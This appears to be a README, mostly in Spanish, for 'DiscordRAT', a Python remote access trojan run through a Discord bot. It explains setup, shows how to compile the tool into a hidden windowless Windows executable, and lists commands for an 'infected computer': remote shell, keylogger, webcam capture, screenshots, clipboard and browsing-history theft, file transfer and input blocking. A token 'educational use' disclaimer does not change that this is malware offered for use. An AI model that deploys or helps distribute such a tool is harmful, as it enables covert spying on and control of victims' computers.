
Herramienta de Administración Remota para Discord completamente escrita en Python3
Herramienta de Administración Remota de Discord completamente escrita en Python3.
Este es un RAT controlado a través de Discord con más de 20 módulos de post-explotación.
Esta herramienta es solo para uso educativo, el autor no se responsabilizará por cualquier mal uso de la misma.
Primero deberá registrar un bot en el portal de desarrolladores de Discord y luego agregar el bot al servidor que desee (asegúrese de que el bot tenga privilegios de administrador). Una vez creado el bot, copie el token de su bot y péguelo en la línea 17.
Instalar requisitos:
pip3 install -r requirements.txt
Luego, si los pasos anteriores fueron exitosos, después de lanzar el archivo python con python DiscordRAT, o lanzar el ejecutable, creará un nuevo canal y publicará un mensaje en el servidor con un número de sesión generado.
¡Ahora su bot debería estar listo para usar!
Requisitos:
Python3,Windows(x64)
Compilación a exe (opcional): Si desea compilar el bot a exe, puede usar PyInstaller. Dentro del directorio del bot ejecute
PyInstaller --onefile --noconsole DiscordRAT.py
O
python3 -m PyInstaller --onefile --noconsole "DiscordRAT.py"
Si ocurrió un error durante la compilación, intente importar el módulo discord
PyInstaller --onefile --noconsole --hidden-import=discord DiscordRAT.py
Availaible commands are :
--> !message = Show a message box displaying your text / Syntax = "!message example"
--> !shell = Execute a shell command /Syntax = "!shell whoami"
--> !webcampic = Take a picture from the webcam
--> !windowstart = Start logging current user window (logging is shown in the bot activity)
--> !windowstop = Stop logging current user window
--> !voice = Make a voice say outloud a custom sentence / Syntax = "!voice test"
--> !admincheck = Check if program has admin privileges
--> !sysinfo = Gives info about infected computer
--> !history = Get computer navigation history
--> !download = Download a file from infected computer
--> !upload = Upload file from website to computer / Syntax = "!upload file.png" (with attachment)
--> !cd = Changes directory
--> !write = Type your desired sentence on infected computer
--> !wallpaper = Change infected computer wallpaper / Syntax = "!wallpaper" (with attachment)
--> !clipboard = Retrieve infected computer clipboard content
--> !geolocate = Geolocate computer using latitude and longitude of the ip adress with google map / Warning : Geolocating IP adresses is not very precise
--> !startkeylogger = Starts a keylogger / Warning : Likely to trigger AV
--> !stopkeylogger = Stops keylogger
--> !dumpkeylogger = Dumps the keylog
--> !volumemax = Put volume at 100%
--> !volumezero = Put volume at 0%
--> !idletime = Get the idle time of user's on target computer
--> !sing = Play chosen video in background
--> !stopsing = Stop video playing in background
--> !blockinput = Blocks user's keyboard and mouse / Warning : Admin rights are required
--> !unblockinput = Unblocks user's keyboard and mouse / Warning : Admin rights are required
--> !screenshot = Get the screenshot of the user's current screen
--> !exit = Exit program
--> !kill = Kill a session or all sessions except current one / Syntax = "!kill session-3" or "!kill all"
Si tiene problemas con la instalación de win32api u otros módulos, intente instalarlos en un entorno virtual de python.
Por favor, evite abrir incidencias sobre errores relacionados con módulos, ya que son causados por su instalación de python y no son un problema inherente de DiscordRAT.
Si encuentra "AttributeError: module 'enum' has no attribute 'IntFlag'" al compilar con PyInstaller, por favor ejecute:
pip uninstall enum34